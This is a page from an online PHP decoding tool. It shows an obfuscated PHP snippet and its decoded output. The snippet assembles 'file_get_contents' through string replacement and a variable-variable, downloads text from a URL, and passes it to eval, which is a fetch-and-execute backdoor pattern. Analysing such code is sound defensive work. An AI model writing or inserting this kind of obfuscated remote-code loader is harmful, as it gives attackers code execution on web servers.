Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $a = str_ireplace("fuck","et_contents","file_gfuck"); $c = "a"; $b= $$c('http://l..
Decoded Output download
<?php
$a = str_ireplace("fuck","et_contents","file_gfuck");
$c = "a";
$b= $$c('http://localhost/test/okok.txt');
eval($d=&$b); ?>
Did this file decode correctly?
Original Code
<?php
$a = str_ireplace("fuck","et_contents","file_gfuck");
$c = "a";
$b= $$c('http://localhost/test/okok.txt');
eval($d=&$b);
Function Calls
str_ireplace | 1 |
Stats
MD5 | e1a4b4a98ae8cf3e914a93bdcf364c3c |
Eval Count | 0 |
Decode Time | 96 ms |